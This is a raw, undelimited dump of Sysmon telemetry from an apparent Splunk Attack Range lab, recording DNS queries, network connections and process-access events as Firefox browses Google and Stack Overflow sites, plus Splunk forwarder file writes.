Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14A518501FA8C12C602E109648DC21AD,SHA256=01911FF115FBAB7F7F37B42F65309AE8F354765D1825912BC2A3AB15307E4FC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105854Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.182{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50064- 354300x8000000000000000105853Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.176{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60804- 354300x8000000000000000105852Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.174{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51037- 354300x8000000000000000105851Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.145{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local51624-false142.250.185.78fra16s48-in-f14.1e100.net443https 354300x8000000000000000105850Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.093{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51796-false142.250.185.78fra16s48-in-f14.1e100.net443https 354300x8000000000000000105849Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.092{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51623- 22542200x8000000000000000105848Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.349{58E9C193-B422-615A-0602-00000000FC01}5552adservice.google.de0type: 5 pagead46.l.doubleclick.net;::ffff:142.250.185.130;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105847Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.196{58E9C193-B422-615A-0602-00000000FC01}5552plus.l.google.com02a00:1450:4001:811::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105846Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.193{58E9C193-B422-615A-0602-00000000FC01}5552plus.l.google.com0142.250.74.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105845Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.191{58E9C193-B422-615A-0602-00000000FC01}5552apis.google.com0type: 5 plus.l.google.com;::ffff:142.250.74.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105844Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.110{58E9C193-B422-615A-0602-00000000FC01}5552consent.youtube.com02a00:1450:4001:82f::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105843Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.097{58E9C193-B422-615A-0602-00000000FC01}5552consent.youtube.com0142.250.185.78;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105842Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.096{58E9C193-B422-615A-0602-00000000FC01}5552consent.youtube.com0::ffff:142.250.185.78;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105841Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.722{58E9C193-B422-615A-0602-00000000FC01}5552consent.google.de02a00:1450:4001:813::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105840Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.718{58E9C193-B422-615A-0602-00000000FC01}5552consent.google.de0142.250.185.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105839Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.716{58E9C193-B422-615A-0602-00000000FC01}5552consent.google.de0::ffff:142.250.185.238;C:\Program Files\Mozilla Firefox\firefox.exe 354300x8000000000000000105838Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.789{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local57976-false142.250.185.238fra16s53-in-f14.1e100.net443https 354300x8000000000000000105837Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.719{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51795-false142.250.185.238fra16s53-in-f14.1e100.net443https 354300x8000000000000000105836Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.708{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50968- 23542300x8000000000000000105835Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.485{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=348934C11F5E44AD38835A87690E7093,SHA256=BE3D401C9A08694B4810D8B4D1A6D7D46255A125FFF03C373B23490E250330D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105834Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:41.483{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2A2BB0839D07B663029957C4C78D6A58,SHA256=6400B3E56D4798E9459378E0C68118C706137E599E04435810B35F8E2C161578,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105833Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.683{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratorudptruefalse10.0.1.14win-dc-639.attackrange.local64689-false142.250.185.110fra16s49-in-f14.1e100.net443https 354300x8000000000000000105832Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.634{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51794-false142.250.185.110fra16s49-in-f14.1e100.net443https 354300x8000000000000000105831Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.632{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64688- 354300x8000000000000000105830Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.631{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59943- 354300x8000000000000000105829Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.629{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64969- 354300x8000000000000000105828Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:40.198{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64509- 354300x800000000000000082893Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:39.772{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50124-false10.0.1.12-8000- 23542300x800000000000000082892Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:58:42.625{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=015DB96D5E29361388E98BC0CC1C54C1,SHA256=AB3848CA735469484F5FDF07F5063DB90C3BE20C40052AC7582FBE0C8C1A0BDA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000105918Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.994{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b66218|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167af82|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105917Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.180{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local58597- 354300x8000000000000000105916Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.180{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local60844- 354300x8000000000000000105915Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.177{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local59254- 354300x8000000000000000105914Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.140{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51801-false151.101.1.69-443https 354300x8000000000000000105913Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.135{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local63410- 354300x8000000000000000105912Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.135{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local50060- 354300x8000000000000000105911Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.131{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local51245- 22542200x8000000000000000105910Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.471{58E9C193-B422-615A-0602-00000000FC01}5552www-google-analytics.l.google.com0142.250.181.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105909Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.399{58E9C193-B422-615A-0602-00000000FC01}5552googlehosted.l.googleusercontent.com02a00:1450:4001:809::2001;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105908Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.399{58E9C193-B422-615A-0602-00000000FC01}5552ipv4.imgur.map.fastly.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105907Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.397{58E9C193-B422-615A-0602-00000000FC01}5552googlehosted.l.googleusercontent.com0142.250.185.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105906Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.397{58E9C193-B422-615A-0602-00000000FC01}5552ipv4.imgur.map.fastly.net0151.101.112.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105905Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.396{58E9C193-B422-615A-0602-00000000FC01}5552lh3.googleusercontent.com0type: 5 googlehosted.l.googleusercontent.com;::ffff:142.250.185.65;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105904Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.396{58E9C193-B422-615A-0602-00000000FC01}5552i.stack.imgur.com0type: 5 ipv4.imgur.map.fastly.net;::ffff:151.101.112.193;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105903Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.395{58E9C193-B422-615A-0602-00000000FC01}5552www.gravatar.com02a04:fa87:fffe::c000:4902;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105902Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.391{58E9C193-B422-615A-0602-00000000FC01}5552www.gravatar.com0192.0.73.2;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105901Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.390{58E9C193-B422-615A-0602-00000000FC01}5552www.gravatar.com0::ffff:192.0.73.2;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105900Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.345{58E9C193-B422-615A-0602-00000000FC01}5552cdn.sstatic.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105899Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.344{58E9C193-B422-615A-0602-00000000FC01}5552cdn.sstatic.net0151.101.193.69;151.101.129.69;151.101.1.69;151.101.65.69;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105898Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.343{58E9C193-B422-615A-0602-00000000FC01}5552cdn.sstatic.net0::ffff:151.101.65.69;::ffff:151.101.193.69;::ffff:151.101.129.69;::ffff:151.101.1.69;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105897Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.146{58E9C193-B422-615A-0602-00000000FC01}5552stackoverflow.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105896Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.141{58E9C193-B422-615A-0602-00000000FC01}5552stackoverflow.com0151.101.193.69;151.101.65.69;151.101.129.69;151.101.1.69;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x8000000000000000105895Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.138{58E9C193-B422-615A-0602-00000000FC01}5552stackoverflow.com0::ffff:151.101.1.69;::ffff:151.101.193.69;::ffff:151.101.65.69;::ffff:151.101.129.69;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x8000000000000000105894Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.654{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105893Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.654{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105892Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.648{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105891Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.646{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105890Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.646{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla Firefox\firefox.exe+4903c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000105889Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.516{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 10341000x8000000000000000105888Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.516{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+27cf1b8|C:\Program Files\Mozilla Firefox\xul.dll+27c04fc|C:\Program Files\Mozilla Firefox\xul.dll+c07a31|C:\Program Files\Mozilla Firefox\xul.dll+27b74bd|C:\Program Files\Mozilla Firefox\xul.dll+c0ed76|C:\Program Files\Mozilla Firefox\xul.dll+c07efb|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+c09b18|C:\Program Files\Mozilla Firefox\xul.dll+27b872e|C:\Program Files\Mozilla Firefox\xul.dll+27b84c4|C:\Program Files\Mozilla Firefox\xul.dll+c0ffd2|C:\Program Files\Mozilla Firefox\xul.dll+c09d79 10341000x8000000000000000105887Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.508{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+9f23c4|C:\Program Files\Mozilla Firefox\xul.dll+b873b1|C:\Program Files\Mozilla Firefox\xul.dll+b635c3|C:\Program Files\Mozilla Firefox\xul.dll+b63777|C:\Program Files\Mozilla Firefox\xul.dll+b872cf|C:\Program Files\Mozilla Firefox\xul.dll+bf8745|C:\Program Files\Mozilla Firefox\xul.dll+3a7e21|C:\Program Files\Mozilla Firefox\xul.dll+3a79a4|C:\Program Files\Mozilla Firefox\xul.dll+3a7848|C:\Program Files\Mozilla Firefox\xul.dll+c0e190|C:\Program Files\Mozilla Firefox\xul.dll+c0db0d|C:\Program Files\Mozilla Firefox\xul.dll+c06ba4|C:\Program Files\Mozilla Firefox\xul.dll+c0c010|C:\Program Files\Mozilla Firefox\xul.dll+c0c76b|C:\Program Files\Mozilla Firefox\xul.dll+39ae11|C:\Program Files\Mozilla Firefox\xul.dll+c0d539|C:\Program Files\Mozilla Firefox\xul.dll+c104f2|C:\Program Files\Mozilla Firefox\xul.dll+c0cf56|C:\Program Files\Mozilla Firefox\xul.dll+39a61b|C:\Program Files\Mozilla Firefox\xul.dll+bedfc3|C:\Program Files\Mozilla Firefox\xul.dll+bed195 10341000x8000000000000000105886Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:58:42.450{58E9C193-B422-615A-0602-00000000FC01}55526520C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B425-615A-0702-00000000FC01}5268C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37e70|C:\Program Files\Mozilla Firefox\firefox.exe+37d66|C:\Program Files\Mozilla Firefox\firefox.exe+49340|C:\Program Files\Mozilla 